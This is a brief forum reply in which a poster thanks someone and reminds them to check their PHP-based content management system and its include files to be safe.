Rep: Reputation: 3600
You're welcome. BTW, if you run any PHP-based content management system, you *did* check your site, includes and whatnot just to be safe, right?
 
All times are GMT -5. The time now is 05:39 AM.